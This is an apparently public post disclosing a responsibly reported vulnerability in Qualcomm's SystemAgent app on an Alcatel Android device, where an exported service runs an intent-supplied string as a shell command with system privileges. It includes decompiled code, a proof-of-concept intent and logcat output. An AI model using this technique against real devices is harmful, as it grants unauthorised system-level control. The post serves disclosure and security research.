From +Tim Strazzere and my defcon workshop, our Qualcomm Escalation to System user vuln + other fun things. Responsibly disclosed to Qualcomm. It was in an apk that should have never shipped on a production device, but was accidentally included in at least one.

Product: TCL/ALCATEL_A564C/Yaris5NA:4.4.2/KVT49L/v4FAZ-0-0:user/release-keys

Application: Qualcomm SystemAgent (com.qualcomm.agent)

Vulnerability 1: Qualcomm SystemAgent application allows blind execution of shell commands as system user.

Local privilege escalation to system user, with multiple groups running in the system_app context


The Qualcomm SystemAgent application has an unsecured (exported, no permissions required):

<service android:name="com.qualcomm.agent.SystemAgent">
        <action android:name="android.system.fullagent" />
        <category android:name="android.intent.category.DEFAULT" />

The when a startService broadcast is sent to the SystemAgent using the fullagent action, the service executes the intent’s “para” as a shell command.

Values.ACTION_FULL_AGENT = "android.system.fullagent";

public int onStartCommand(Intent intent, int flags, int startId) {
// .. snip ..
    else if(Values.ACTION_FULL_AGENT.equals(intent.getAction())) {

    return 1;

    void exec(String para) {
        new Thread() {
            final SystemAgent this$0;
            final String val$para;

            public void run() {
                int v13 = 0x23;
                try {
                    String[] paras = this.val$para.split(",");
                    int i;
                    for(i = 0; i < paras.length; ++i) {
                        SystemAgent.logd(i + ":" + paras[i]);

                    Process mProcess = Runtime.getRuntime().exec(paras);
                    BufferedReader inBuffer = new BufferedReader(new InputStreamReader(mProcess.getInputStream()));
                    String data;
                    for(data = ""; true; data = data + s + "\n") {
                        String s = inBuffer.readLine();
                        if(s == null) {

                    int result = mProcess.exitValue();
                    SystemAgent.logd("ExitValue=" + result);
                    String resultProp = paras[0] + ",";
                    if(result >= 0 && result != 0xFF) {
                        resultProp = data.length() > v13 ? resultProp + data.substring(0, 0x23) : resultProp + data;

AgentUtils.setSystemProperties(Values.AGENT_RESULT_PROP, resultProp);
                catch(Exception e) {


ComponentName intentComponent = new ComponentName("com.qualcomm.agent", "com.qualcomm.agent.SystemAgent");
Intent serviceIntent = new Intent ("android.system.fullagent");
serviceIntent.putExtra("para", "/system/bin/id");

From logcat

D/SystemAgent( 4109): [onCreate] RUN
D/SystemAgent( 4109): [onStartCommand] 1
D/SystemAgent( 4109): [access$000] /system/bin/id
D/SystemAgent( 4109): [access$000] 0:/system/bin/id
D/SystemAgent( 4109): [access$000] uid=1000(system) gid=1000(system) groups=1000(system),1004(input),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1028(sdcard_r),2002(diag),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(qcom_diag),41000(u0_a31000) context=u:r:system_app:s0
D/SystemAgent( 4109): [access$000] ExitValue=0

Additional related vulnerabilities in SystemAgent application:

private void doSystemActions(String para) through the same service allows you to:
Set system properties
Write strings to files as system user (writeFileAgent)
Take a screen shot and save it to “/storage/sdcard1/logs/screenshot.png"
Reboot the device
Shared publiclyView activity